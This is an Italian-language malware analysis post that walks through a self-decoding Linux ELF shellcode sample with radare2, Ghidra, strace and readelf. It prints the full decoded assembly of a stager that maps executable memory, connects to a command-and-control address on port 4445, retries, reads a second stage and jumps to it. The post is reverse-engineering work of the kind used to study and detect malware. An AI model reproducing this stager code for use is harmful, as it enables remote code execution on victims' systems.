    By AKIRA BASHO il 30 Mar. 2023
    0 Comments   35 Views

    0x00400078 mov edi, 0x6e301cbd
    0x0040007d fcmovnu st(0), st(4)
    0x0040007f fnstenv [rsp - 0xc]
    0x00400083 pop rdx
    0x00400084 sub ecx, ecx ; arg4
    0x00400086 mov cl, 0x21 ; '!' ; 33
    0x00400088 sub edx, 0xfffffffc
    0x0040008b xor dword [rdx + 0x10], edi
    0x00400091 pop rdi
    0x00400092 jmp 0x78a0600f

    ;il malware si comporta in maniera del tutto simile all'elf malware2 analizzato nel post procedente; la cosa particolare di questo malware risiede nel fatto che staticamente non può essere analizzato; abbiamo solo un piccolo pezzettino di codice dopo il quale sia radare2 sia ghidra vedono badcode senza alcun significato; ma analizzando con il debugger di radare2, passo dopo passo, si può notare come il malware va a riscriversi partendo dall'indirizzo di memoria 0x00400091;

    rdx 0x00400081 + 0x10 = 0x00400091

    :> x/8x 0x00400091
    0x00400091 5fe9 785f 6078 70c7

    ;in rdi abbiamo il valore 0x6e301cbd

    0x00400091 pop rdi
    0x00400092 jmp 0x78a0600f

    ;analizzando staticamente il disassemblato in queste locazioni di memoria abbiamo questi comandi, e poi a seguire codice che ghidra e radare2 considerano badcode;
    ma è proprio il codice stesso che inizia a riscriversi creando prima un loop e poi attraverso il loop stesso, si riscrive completamente mediante delle xor;


    e2f5 4831 6078 70c7

    0x0040008b xor dword [rdx + 0x10], edi
    0x0040008e add edi, dword [rdx + 0x10]
    0x00400091 loop 0x400088

    ;rdx 0x00400081 + 0x10 = 0x00400091

    ;a questo indirizzo infatti abbiamo il byte 5f che viene xororato con il byte meno significativo di edi, edi=0x6e301cbd, che è bd

    5f ^ bd = e2
    e9 ^ 1c = f5

    ;e2f5 vengono poi tradotti nell'istruzione loop 0x400088 che si ripeterà ecx volte, ogni volta andando a riscrivere parte del malware; solo alla fine di questo loop abbiamo il codice disassemblato completo del malware;

    [0x00400078]> pdf
    0x00400078 mov edi, 0x6e301cbd
    0x0040007d fcmovnu st(0), st(4)
    0x0040007f fnstenv [rsp - 0xc]
    0x00400083 pop rdx
    0x00400084 sub ecx, ecx ;arg4
    0x00400086 mov cl, 0x21 ;33
    0x00400088 sub edx, 0xfffffffc
    0x0040008b xor dword [rdx + 0x10], edi
    0x0040008e add edi, dword [rdx + 0x10]
    0x00400091 loop 0x400088
    0x00400093 xor rdi, rdi
    0x00400096 push 9 ;rax
    0x00400098 pop rax
    0x00400099 cdq
    0x0040009a mov dh, 0x10 ;16
    0x0040009c mov rsi, rdx
    0x0040009f xor r9, r9
    0x004000a2 push 0x22 ;r10
    0x004000a4 pop r10
    0x004000a6 mov dl, 7
    0x004000a8 syscall

    ;la prima syscall è mmap

    0x004000aa test rax, rax
    0x004000ad js 0x400100
    0x004000af push 0xa ;10
    0x004000b1 pop r9
    0x004000b3 push rax
    0x004000b4 push 0x29 ;41
    0x004000b6 pop rax
    0x004000b7 cdq 0x004000b8 6a02 push 2 ;2
    0x004000ba pop rdi
    0x004000bb push 1 ;1
    0x004000bd pop rsi
    0x004000be syscall

    ;la seconda syscall è la socket

    0x004000c0 test rax, rax
    0x004000c3 js 0x400100
    0x004000c5 xchg rdi, rax
    0x004000c7 movabs rcx, 0x361f050a5d110002


    ; --> C&C

    >>> 0x115d

    0x004000d1 push rcx
    0x004000d2 mov rsi, rsp
    0x004000d5 push 0x10 ; 16
    0x004000d7 pop rdx
    0x004000d8 push 0x2a ; '*' ; 42
    0x004000da pop rax
    0x004000db syscall

    ;poi abbiamo una connect

    0x004000dd pop rcx
    0x004000de test rax, rax
    0x004000e1 jns 0x400108
    0x004000e3 dec r9
    0x004000e6 je 0x400100
    0x004000e8 push rdi
    0x004000e9 push 0x23 ;35
    0x004000eb pop rax
    0x004000ec push 0
    0x004000ee push 5 ;5
    0x004000f0 mov rdi, rsp
    0x004000f3 xor rsi, rsi
    0x004000f6 syscall


    0x004000f8 pop rcx
    0x004000f9 pop rcx
    0x004000fa pop rdi
    0x004000fb test rax, rax
    0x004000fe jns 0x4000c7

    ;aspetta e torna indietro e riprova la connect

    0x00400100 push 0x3c ;60
    0x00400102 pop rax
    0x00400103 push 1 ;1
    0x00400105 pop rdi
    0x00400106 syscall


    0x00400108 pop rsi
    0x00400109 push 0x7e ; '~' ; 126
    0x0040010b pop rdx
    0x0040010c syscall

    ;qui dovrebbe essere una read

    0x0040010e test rax, rax
    0x00400111 js 0x400100
    0x00400113 jmp rsi

    ;qui salta al codice scaricato dalla read

    ;fcmovnu floating-point condition move; move if not unordered (PF=0)
    fnstenv Saves the current FPU operating environment at the memory location specified with the destination operand, and then masks all floating-point exceptions.

    strace ./5eb69f3b46a0df45f5e4f2c0beede4a86f9aace3870dd8db28bc6521e69f363b
    execve("./5eb69f3b46a0df45f5e4f2c0beede4a86f9aace3870dd8db28bc6521e69f363b", ["./5eb69f3b46a0df45f5e4f2c0beede4"...], 0x7ffd4f7d2240 /* 48 vars */) = 0
    mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0) = 0x7f845e483000
    connect(3, {sa_family=AF_INET, sin_port=htons(4445), sin_addr=inet_addr("")}, 16) = -1 ENETUNREACH (Network is unreachable)
    nanosleep({tv_sec=5, tv_nsec=0}, ^Cstrace: Process 1716 detached
    <detached ...>


    ltrace ./5eb69f3b46a0df45f5e4f2c0beede4a86f9aace3870dd8db28bc6521e69f363b
    Couldn't find .dynsym or .dynstr in "/proc/1746/exe"


    clamscan ./5eb69f3b46a0df45f5e4f2c0beede4a86f9aace3870dd8db28bc6521e69f363b

    /home/remnux/FollowTheWhiteRabbit/Linux-Malware-Samples/quarantena/5eb69f3b46a0df45f5e4f2c0beede4a86f9aace3870dd8db28bc6521e69f363b: Win.Trojan.MSShellcode-6360729-4 FOUND

    ----------- SCAN SUMMARY -----------
    Known viruses: 8656935
    Engine version: 0.103.6
    Scanned directories: 0
    Scanned files: 1
    Infected files: 1
    Data scanned: 0.00 MB
    Data read: 0.00 MB (ratio 0.00:1)
    Time: 22.428 sec (0 m 22 s)
    Start Date: 2023:03:27 11:44:54
    End Date: 2023:03:27 11:45:17


    readelf -s ./5eb69f3b46a0df45f5e4f2c0beede4a86f9aace3870dd8db28bc6521e69f363b

    Dynamic symbol information is not available for displaying symbols.

    readelf -l ./5eb69f3b46a0df45f5e4f2c0beede4a86f9aace3870dd8db28bc6521e69f363b

    Elf file type is EXEC (Executable file)
    Entry point 0x400078
    There is 1 program header, starting at offset 64

    Program Headers:
    Type Offset VirtAddr PhysAddr
    FileSiz MemSiz Flags Align
    LOAD 0x0000000000000000 0x0000000000400000 0x0000000000400000
    0x0000000000000115 0x00000000000001b2 RWE 0x1000

    readelf -h ./5eb69f3b46a0df45f5e4f2c0beede4a86f9aace3870dd8db28bc6521e69f363b
    ELF Header:
    Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
    Class: ELF64
    Data: 2's complement, little endian
    Version: 1 (current)
    OS/ABI: UNIX - System V
    ABI Version: 0
    Type: EXEC (Executable file)
    Machine: Advanced Micro Devices X86-64
    Version: 0x1
    Entry point address: 0x400078
    Start of program headers: 64 (bytes into file)
    Start of section headers: 0 (bytes into file)
    Flags: 0x0
    Size of this header: 64 (bytes)
    Size of program headers: 56 (bytes)
    Number of program headers: 1
    Size of section headers: 0 (bytes)
    Number of section headers: 0
    Section header string table index: 0


    void entry(void)

    uint *puVar1;
    int in_FPUInstructionPointer;

    puVar1 = (uint *)((ulong)(in_FPUInstructionPointer + 4) + 0x10);
    *puVar1 = *puVar1 ^ 0x6e301cbd;
    /* WARNING: Bad instruction - Truncating control flow here */

    ;ghidra decompiler

    Edited by AKIRA BASHO - 19/11/2023, 14:28